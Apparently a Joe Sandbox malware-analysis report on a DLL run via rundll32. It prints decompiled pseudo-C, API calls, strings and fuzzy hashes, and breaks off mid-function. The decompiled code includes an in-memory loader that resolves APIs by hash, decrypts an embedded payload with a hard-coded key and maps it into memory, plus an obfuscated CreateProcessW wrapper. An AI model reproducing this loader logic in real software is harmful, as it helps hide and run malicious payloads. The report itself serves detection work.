Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 08cff93c7344199116f568f774659ccae89e30fc42bc807c3f2613e3b5310ed8
Instruction ID: 2ef2df373ea658209f5af2a718a6df98ca9e1c1927523c70ceffa034f4820264
Opcode Fuzzy Hash: 08cff93c7344199116f568f774659ccae89e30fc42bc807c3f2613e3b5310ed8
Instruction Fuzzy Hash: 01E1F874A01219EFEB04CF94C994E9EB7B2FF88384F208559E905AB399D770AD46CF50

Uniqueness

Uniqueness Score: -1.00%

Function 100088E0, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 131
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E100088E0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HWND__* _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct HWND__* _v28;
				struct HWND__* _v32;
				long _v36;
				int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void* __ebp;
				void* _t38;
				long _t45;
				long _t47;
				intOrPtr _t56;
				void* _t63;
				intOrPtr _t68;

				_t79 = __esi;
				_t78 = __edi;
				_t64 = __ebx;
				_v56 = _a8;
				 *0x10058ed0 = _a4;
				_t72 = _a8;
				 *0x10058ed4 = _a8;
				 *0x10058ed8 = _a12;
				_v8 = 0;
				_v36 = 0;
				_v28 = 0;
				_v32 = 0;
				_v12 = 0;
				_t38 = E10008860(__eflags); // executed
				if(_t38 != 0) {
					_push(0x10029b4c);
					E1001771B(__ebx, _t72, __edi, __esi, __eflags);
					return 0;
				}
				 *0x10056f08 = 0;
				 *0x10056f0c = 0;
				 *0x10056f10 = 0;
				 *0x10056f18 = 0;
				 *0x10056f14 = 0;
				_v40 = 0x44368d;
				_v52 = 0x3f8fc5;
				_v20 = 0x3b272b;
				_v24 = 0x2feb60;
				_v44 = 0xdd3c;
				_v48 = 0x47c;
				_v36 = 0x24e00;
				_v28 = E10006170(L"kernel32.dll");
				_v32 = E10006170(L"ntdll.dll");
				 *0x10058eb0 = E10006D50(_v28, 0x70e66e6b);
				 *0x10058eb8 = E10006D50(_v28, 0x579606ae);
				_t95 =  *0x10058eb8;
				if( *0x10058eb8 == 0) {
					_t45 = E10017716(0x10029b18);
					_t47 = E10017716("8192") | 0x00001000;
					__eflags = _t47;
					_v12 = VirtualAlloc(0, _v36, _t47, _t45);
				} else {
					_t63 =  *0x10058eb8(0xffffffff, 0, _v36, E10017716("8192") | 0x00001000, E10017716(0x10029b18), 0); // executed
					_v12 = _t63;
				}
				E10016A10(_t64, _t78, _t79, _v12, 0x10032098, _v36);
				_t68 =  *0x10056f04; // 0x730f
				_v16 = E1001703B(_t64, _v36, _t78, _t79, _t68);
				E10002FA0(_t95, _v16, "vzyxQQjtnPpM1kMtP2^c)toAOgGzJnA(x4n)mZV?Zgqbqls>&28Kb303hUncVaad@?N*A%W2eBhDNd+m_Bl2cFznqh*vrDpHPGj%?_!pbLp", 0x6c);
				E10004F00(_v16, _v12, _v36);
				_t56 = E10002D20(0x10058ebc, _v12, _v36); // executed
				 *0x10058edc = _t56;
				ShowWindow(0, _v40);
				return 1;
			}

APIs

Part of subcall function 10008860: _malloc.LIBCMT ref: 1000886B

_printf.LIBCMT ref: 1000896B
VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00024E00,00000000,00000000,00000000), ref: 10008A2B
VirtualAlloc.KERNEL32(00000000,00024E00,00000000,00000000), ref: 10008A5D
_malloc.LIBCMT ref: 10008A82
ShowWindow.USER32(00000000,0044368D,00000000,00024E00), ref: 10008AD1

Strings

ntdll.dll, xrefs: 100089BB
8192, xrefs: 10008A10, 10008A44
+';, xrefs: 10008988
`/, xrefs: 1000898F
vzyxQQjtnPpM1kMtP2^c)toAOgGzJnA(x4n)mZV?Zgqbqls>&28Kb303hUncVaad@?N*A%W2eBhDNd+m_Bl2cFznqh*vrDpHPGj%?_!pbLp, xrefs: 10008A8F
kernel32.dll, xrefs: 100089AB

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AllocVirtual_malloc$NumaShowWindow_printf
String ID: +';$8192$`/$kernel32.dll$ntdll.dll$vzyxQQjtnPpM1kMtP2^c)toAOgGzJnA(x4n)mZV?Zgqbqls>&28Kb303hUncVaad@?N*A%W2eBhDNd+m_Bl2cFznqh*vrDpHPGj%?_!pbLp
API String ID: 1487653210-3670691644
Opcode ID: 230bbdfcd20e835c4d7365e9bc9cc9309c602f396e76a36ffbf0d77b2387037d
Instruction ID: 74e036033439e47f0f6271ee42a165f027743cdfe4c2c4d01037afcb8f86e406
Opcode Fuzzy Hash: 230bbdfcd20e835c4d7365e9bc9cc9309c602f396e76a36ffbf0d77b2387037d
Instruction Fuzzy Hash: FE5141F5D00214AFEB00CF90EC96BAE77B4FB48344F144528E909BB345E775A6448BA2

Uniqueness

Uniqueness Score: -1.00%

Function 10013A9B, Relevance: 16.6, APIs: 11, Instructions: 103
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E10013A9B() {
				struct _CRITICAL_SECTION* _v4;
				char _v28;
				char _v36;
				char _v44;
				intOrPtr _v56;
				void* __ebx;
				intOrPtr __ecx;
				signed int __edi;
				void* __esi;
				void* __ebp;
				struct _CRITICAL_SECTION* _t39;
				intOrPtr _t40;
				void* _t41;
				long _t44;
				void* _t45;
				signed int* _t51;
				intOrPtr _t64;
				long _t68;
				void* _t69;
				void* _t70;
				signed int _t72;
				intOrPtr _t78;
				signed int _t82;
				void* _t86;
				signed int _t88;
				void* _t90;
				void* _t91;
				void* _t93;

				_push(_t72);
				_push(_t69);
				_push(_t88);
				_t86 = _t72;
				_t1 = _t86 + 0x1c; // 0x1005aaa8
				_t39 = _t1;
				_v4 = _t39;
				EnterCriticalSection(_t39);
				_t3 = _t86 + 4; // 0x20
				_t40 =  *_t3;
				_t4 = _t86 + 8; // 0x3
				_t82 =  *_t4;
				if(_t82 >= _t40) {
					L7:
					_t82 = 1;
					__eflags = _t40 - 1;
					if(_t40 <= 1) {
						L12:
						_t21 = _t40 + 0x20; // 0x40
						_t88 = _t21;
						_t22 = _t86 + 0x10; // 0x3110828
						_t41 =  *_t22;
						__eflags = _t41;
						if(__eflags != 0) {
							_t69 = GlobalHandle(_t41);
							GlobalUnlock(_t69);
							_t44 = E100134F9(_t72, __eflags, _t88, 8);
							_t72 = 0x2002;
							_t45 = GlobalReAlloc(_t69, _t44, ??);
						} else {
							_t68 = E100134F9(_t72, __eflags, _t88, 8);
							_pop(_t72);
							_t45 = GlobalAlloc(2, _t68); // executed
						}
						__eflags = _t45;
						if(_t45 != 0) {
							_t70 = GlobalLock(_t45);
							_t25 = _t86 + 4; // 0x20
							__eflags = _t88 -  *_t25 << 3;
							E100174D0(_t82, _t70 +  *_t25 * 8, 0, _t88 -  *_t25 << 3);
							 *(_t86 + 4) = _t88;
							 *(_t86 + 0x10) = _t70;
							goto L20;
						} else {
							_t23 = _t86 + 0x10; // 0x3110828
							_t86 =  *_t23;
							__eflags = _t86;
							if(_t86 != 0) {
								GlobalLock(GlobalHandle(_t86));
							}
							LeaveCriticalSection(_v4);
							_push(_t88);
							_t90 = _t93;
							_push(_t72);
							_v28 = 0x10057168;
							E10017C83( &_v28, 0x1002e258);
							asm("int3");
							_push(_t90);
							_t91 = _t93;
							_push(_t72);
							_v36 = 0x10057200;
							E10017C83( &_v36, 0x1002e2b8);
							asm("int3");
							_push(_t91);
							_push(_t72);
							_v44 = 0x10057298;
							E10017C83( &_v44, 0x1002e2fc);
							asm("int3");
							_push(4);
							E10017BC1(E10027DEC, _t69, _t82, _t86);
							_t78 = E10013965(0x104);
							_v56 = _t78;
							_t64 = 0;
							_v44 = 0;
							if(_t78 != 0) {
								_t64 = E1000CF71(_t78);
							}
							return E10017C60(_t64);
						}
					} else {
						_t18 = _t86 + 0x10; // 0x3110828
						_t72 =  *_t18 + 8;
						__eflags = _t72;
						while(1) {
							__eflags =  *_t72 & 0x00000001;
							if(( *_t72 & 0x00000001) == 0) {
								break;
							}
							_t82 = _t82 + 1;
							_t72 = _t72 + 8;
							__eflags = _t82 - _t40;
							if(_t82 < _t40) {
								continue;
							}
							break;
						}
						__eflags = _t82 - _t40;
						if(_t82 < _t40) {
							goto L20;
						} else {
							goto L12;
						}
					}
				} else {
					_t13 = __esi + 0x10; // 0x3110828
					__ecx =  *_t13;
					__eflags =  *(__ecx + __edi * 8) & 0x00000001;
					if(( *(__ecx + __edi * 8) & 0x00000001) == 0) {
						L20:
						_t30 = _t86 + 0xc; // 0x3
						__eflags = _t82 -  *_t30;
						if(_t82 >=  *_t30) {
							_t31 = _t82 + 1; // 0x4
							 *((intOrPtr*)(_t86 + 0xc)) = _t31;
						}
						_t33 = _t86 + 0x10; // 0x3110828
						_t51 =  *_t33 + _t82 * 8;
						 *_t51 =  *_t51 | 0x00000001;
						__eflags =  *_t51;
						_t37 = _t82 + 1; // 0x4
						 *(_t86 + 8) = _t37;
						LeaveCriticalSection(_v4);
						return _t82;
					} else {
						goto L7;
					}
				}
			}

APIs

EnterCriticalSection.KERNEL32(1005AAA8,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004), ref: 10013AAA
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10013B00
GlobalHandle.KERNEL32(03110828), ref: 10013B09
GlobalUnlock.KERNEL32(00000000,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004), ref: 10013B12
GlobalReAlloc.KERNEL32 ref: 10013B29
GlobalHandle.KERNEL32(03110828), ref: 10013B3B
GlobalLock.KERNEL32 ref: 10013B42
LeaveCriticalSection.KERNEL32(?,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004), ref: 10013B4C
GlobalLock.KERNEL32 ref: 10013B58
_memset.LIBCMT ref: 10013B71
LeaveCriticalSection.KERNEL32(?), ref: 10013B9D

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: db40230195121c03edd1d9de773089a9b398076d37fb16ef380e98a53d4696a6
Instruction ID: d2dedea389880cd6532a8cc41d1f31ca5a81082a511f3f96b23d25218acb7329
Opcode Fuzzy Hash: db40230195121c03edd1d9de773089a9b398076d37fb16ef380e98a53d4696a6
Instruction Fuzzy Hash: 5F31C1312043129FE720CF34CC8DA2A77E9FF84280B12891DE996C7651EB30F885CB10

Uniqueness

Uniqueness Score: -1.00%

Function 10016380, Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 27%

			E10016380(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x1002f780);
				_t8 = E1001984C(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E10019891(_t8);
				}
				if( *0x1005c984 != 3) {
					_push(_t23);
					L7:
					_push(0);
					_t8 = RtlFreeHeap( *0x1005ad4c); // executed
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E10017D62(_t31);
						 *_t10 = E10017D27(GetLastError());
					}
					goto L9;
				}
				E1001A549(4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E1001A5C2(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E1001A5ED();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E100163D6();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}

APIs

__lock.LIBCMT ref: 1001639E

Part of subcall function 1001A549: __mtinitlocknum.LIBCMT ref: 1001A55D
Part of subcall function 1001A549: __amsg_exit.LIBCMT ref: 1001A569
Part of subcall function 1001A549: EnterCriticalSection.KERNEL32(00000001,00000001,?,1001C014,0000000D,1002FA58,00000008,1001C106,00000001,?,?,00000001,?,?,10017AE8,00000001), ref: 1001A571

___sbh_find_block.LIBCMT ref: 100163A9
___sbh_free_block.LIBCMT ref: 100163B8
RtlFreeHeap.NTDLL(00000000,?,1002F780,0000000C,1001BF6A,00000000,?,1001E73B,?,00000001,00000001,1001A4D3,00000018,1002F8C0,0000000C,1001A562), ref: 100163E8
GetLastError.KERNEL32(?,1001E73B,?,00000001,00000001,1001A4D3,00000018,1002F8C0,0000000C,1001A562,00000001,00000001,?,1001C014,0000000D,1002FA58), ref: 100163F9

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 933a214dfe2b721a1172918ae6127c9818b4b1158d9b2876c596c2397cc5b652
Instruction ID: 632ebcc47bfd7d50c2ae726889ea94072d2ceb4c664f4e9832d4c107bd8c1e1e
Opcode Fuzzy Hash: 933a214dfe2b721a1172918ae6127c9818b4b1158d9b2876c596c2397cc5b652
Instruction Fuzzy Hash: EE01D635805326EBEF20DBB4AC0AB9D3BF4EF053A0F214109F554AE091CB34EAC19A64

Uniqueness

Uniqueness Score: -1.00%

Function 04C22C24, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E04C22C24(WCHAR* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a20, int _a24, intOrPtr _a28, struct _STARTUPINFOW* _a32, intOrPtr _a40, intOrPtr _a44, WCHAR* _a52, struct _PROCESS_INFORMATION* _a56) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				intOrPtr _v32;
				void* _t49;
				int _t56;
				WCHAR* _t60;

				_push(_a56);
				_t60 = __ecx;
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(0);
				_push(0);
				_push(__ecx);
				E04C1FE29(_t49);
				_v32 = 0x534833;
				_v28 = 0;
				_v24 = 0;
				_v8 = 0x70adbe;
				_v8 = _v8 >> 5;
				_v8 = _v8 << 0xa;
				_v8 = _v8 | 0x1d11c356;
				_v8 = _v8 ^ 0x1f145645;
				_v20 = 0xecea8a;
				_v20 = _v20 | 0x5baa72b8;
				_v20 = _v20 ^ 0x5be1d11d;
				_v16 = 0x76217f;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 | 0xe98780dc;
				_v16 = _v16 ^ 0xe98c1e91;
				_v12 = 0xeb975;
				_v12 = _v12 ^ 0xd8138edb;
				_v12 = _v12 | 0x0b4171d5;
				_v12 = _v12 ^ 0xdb5d9300;
				E04C0EB52(__ecx, __ecx, 0xb7160725, 0x75, 0xa2289af1);
				_t56 = CreateProcessW(_a52, _t60, 0, 0, _a24, 0, 0, 0, _a32, _a56); // executed
				return _t56;
			}

0x04c22c2c
0x04c22c31
0x04c22c33
0x04c22c36
0x04c22c37
0x04c22c3a
0x04c22c3d
0x04c22c3e
0x04c22c41
0x04c22c44
0x04c22c47
0x04c22c4a
0x04c22c4b
0x04c22c4e
0x04c22c4f
0x04c22c51
0x04c22c52
0x04c22c57
0x04c22c61
0x04c22c64
0x04c22c67
0x04c22c6e
0x04c22c72
0x04c22c76
0x04c22c7d
0x04c22c84
0x04c22c8b
0x04c22c92
0x04c22c99
0x04c22ca0
0x04c22ca4
0x04c22cab
0x04c22cb2
0x04c22cb9
0x04c22cc0
0x04c22cc7
0x04c22ce8
0x04c22d02
0x04c22d09

APIs

CreateProcessW.KERNELBASE(?,2E751909,00000000,00000000,00534833,00000000,00000000,00000000,?,?), ref: 04C22D02

Strings

3HS, xrefs: 04C22C57

Memory Dump Source

Source File: 00000003.00000002.351221459.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true

Associated: 00000003.00000002.351214986.0000000004C00000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.351289257.0000000004C26000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4c00000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: 3HS
API String ID: 963392458-330188696
Opcode ID: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
Instruction ID: 9030d3104b6d828b8a41cad177a2fcb404cd0374fe09eb92ad87e98ba2e9ccd8
Opcode Fuzzy Hash: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
Instruction Fuzzy Hash: BE21F572800248BBCF159F96DC0ACDFBFB9EF85744F108148F91562220C3759A24DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 100021D0, Relevance: 3.1, APIs: 2, Instructions: 98
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E100021D0(intOrPtr __ecx, intOrPtr* _a4, void** _a8) {
				long _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				int _t67;

				_v28 = __ecx;
				if(_a8[2] != 0) {
					if((_a8[3] & 0x02000000) == 0) {
						asm("sbb ecx, ecx");
						_v16 =  ~( ~(_a8[3] & 0x20000000));
						asm("sbb eax, eax");
						_v24 =  ~( ~(_a8[3] & 0x40000000));
						asm("sbb edx, edx");
						_v12 =  ~( ~(_a8[3] & 0x80000000));
						_t39 = _v24 * 8; // 0x10056f20
						_v20 =  *((intOrPtr*)((_v16 << 4) + _t39 + 0x10056f20 + _v12 * 4));
						if((_a8[3] & 0x04000000) != 0) {
							_v20 = _v20 | 0x00000200;
						}
						_t67 = VirtualProtect( *_a8, _a8[2], _v20,  &_v8); // executed
						if(_t67 != 0) {
							return 1;
						} else {
							return 0;
						}
					}
					if( *_a8 == _a8[1] && (_a8[4] != 0 ||  *((intOrPtr*)( *_a4 + 0x38)) ==  *(_a4 + 0x30) || _a8[2] %  *(_a4 + 0x30) == 0)) {
						VirtualFree( *_a8, _a8[2], 0x4000); // executed
					}
					return 1;
				}
				return 1;
			}

APIs

VirtualFree.KERNELBASE(00000000,?,00004000,?,10002468,00000001,00000000,?,10002C68,?,?,?,?,10002C68,00000000,00000000), ref: 10002244

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 47f32b032b7fce0672a30d9b107070a1881b22e5365e79d9d7a5c7562cbc9459
Instruction ID: def7816fd77fd5aef653724919a03fde70f7e86383ff2ba96e4cf8bb5acc80b5
Opcode Fuzzy Hash: 47f32b032b7fce0672a30d9b107070a1881b22e5365e79d9d7a5c7562cbc9459
Instruction Fuzzy Hash: 5A41B674600109AFEB44CF98C890BA9B7B6FB88350F25C659EC1A9F395C731EE41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1001A305, Relevance: 3.0, APIs: 2, Instructions: 28
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1001A305(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x1005ad4c = _t6;
				if(_t6 != 0) {
					_t7 = E1001A2AA(__eflags);
					__eflags = _t7 - 3;
					 *0x1005c984 = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E1001A57A(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x1005ad4c);
							 *0x1005ad4c =  *0x1005ad4c & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,1001796A,00000001,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C), ref: 1001A316
HeapDestroy.KERNEL32(?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001A34C

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Heap$CreateDestroy
String ID:
API String ID: 3296620671-0
Opcode ID: 2498113e0f0cb93b929c98f8b50cab2ed5fb389832bb0c331937e648ce874443
Instruction ID: 8ebff57b685a6f4636b50d0b354dfd0ee4d70228ae444a146c3f0929ed30e208
Opcode Fuzzy Hash: 2498113e0f0cb93b929c98f8b50cab2ed5fb389832bb0c331937e648ce874443
Instruction Fuzzy Hash: 93E06D71A193569EFB10AB308C9972536F4EB46386F104826F911CD4A0F7B0C6C09A01

Uniqueness

Uniqueness Score: -1.00%

Function 10002010, Relevance: 2.6, APIs: 2, Instructions: 115
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10002010(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				void* _v12;
				long _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t76;
				void* _t127;

				_v28 = __ecx;
				_t3 = _a16 + 4; // 0x104e9
				_v20 =  *_t3;
				_t7 =  *_a16 + 0x14; // 0x4a8bb445
				_t9 = ( *_t7 & 0x0000ffff) + 0x18; // 0x10002c17
				_v24 =  *_a16 + _t9;
				_v8 = 0;
				while(1) {
					_t17 =  *_a16 + 6; // 0xe9000001
					if(_v8 >= ( *_t17 & 0x0000ffff)) {
						break;
					}
					if( *(_v24 + 0x10) != 0) {
						_t41 = _v24 + 0x14; // 0x4a8bb445
						_t43 = _v24 + 0x10; // 0x8b118bbc
						if(E10001FE0(_v28, _a8,  *_t41 +  *_t43) != 0) {
							_t47 = _v24 + 0x10; // 0x8b118bbc
							_t50 = _v24 + 0xc; // 0x4d8b0000
							_t76 = VirtualAlloc(_v20 +  *_t50,  *_t47, 0x1000, 4); // executed
							_v12 = _t76;
							if(_v12 != 0) {
								_t55 = _v24 + 0xc; // 0x4d8b0000
								_v12 = _v20 +  *_t55;
								_t58 = _v24 + 0x10; // 0x8b118bbc
								_t61 = _v24 + 0x14; // 0x4a8bb445
								E10001E60(_v12, _a4 +  *_t61,  *_t58);
								_t127 = _t127 + 0xc;
								 *((intOrPtr*)(_v24 + 8)) = _v12;
								L1:
								_v8 = _v8 + 1;
								_v24 = _v24 + 0x28;
								continue;
							}
							return 0;
						}
						return 0;
					}
					_v16 =  *((intOrPtr*)(_a12 + 0x38));
					if(_v16 <= 0) {
						L8:
						goto L1;
					}
					_t28 = _v24 + 0xc; // 0x4d8b0000
					_v12 = VirtualAlloc(_v20 +  *_t28, _v16, 0x1000, 4);
					if(_v12 != 0) {
						_t33 = _v24 + 0xc; // 0x4d8b0000
						_v12 = _v20 +  *_t33;
						 *((intOrPtr*)(_v24 + 8)) = _v12;
						E10001E10(_v12, 0, _v16);
						_t127 = _t127 + 0xc;
						goto L8;
					}
					return 0;
				}
				return 1;
			}

APIs

VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,10002BFF,00000000), ref: 10002091
VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10008AC6,8B118BBC,?,10002BFF,00000000,10008AC6,?), ref: 1000210C

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1f005b19e3c441fc20b6c29efe2afaeec2d3b558fdbd29b30d99f40439f16acf
Instruction ID: c265c5d024e1aaa08d03296b5d335ffe068feccc9d90f6e2fd2d76d71ec68577
Opcode Fuzzy Hash: 1f005b19e3c441fc20b6c29efe2afaeec2d3b558fdbd29b30d99f40439f16acf
Instruction Fuzzy Hash: 4E51DEB4A0020ADFDB04CF94C591AAEB7F1FF48344F208598E915AB355D771EE91CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10008860, Relevance: 1.5, APIs: 1, Instructions: 41
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E10008860(void* __eflags) {
				char* _v8;
				intOrPtr _v12;
				char _v16;
				char* _v20;
				void* __ebp;
				void* _t25;
				void* _t29;
				intOrPtr _t32;
				void* _t33;
				void* _t34;

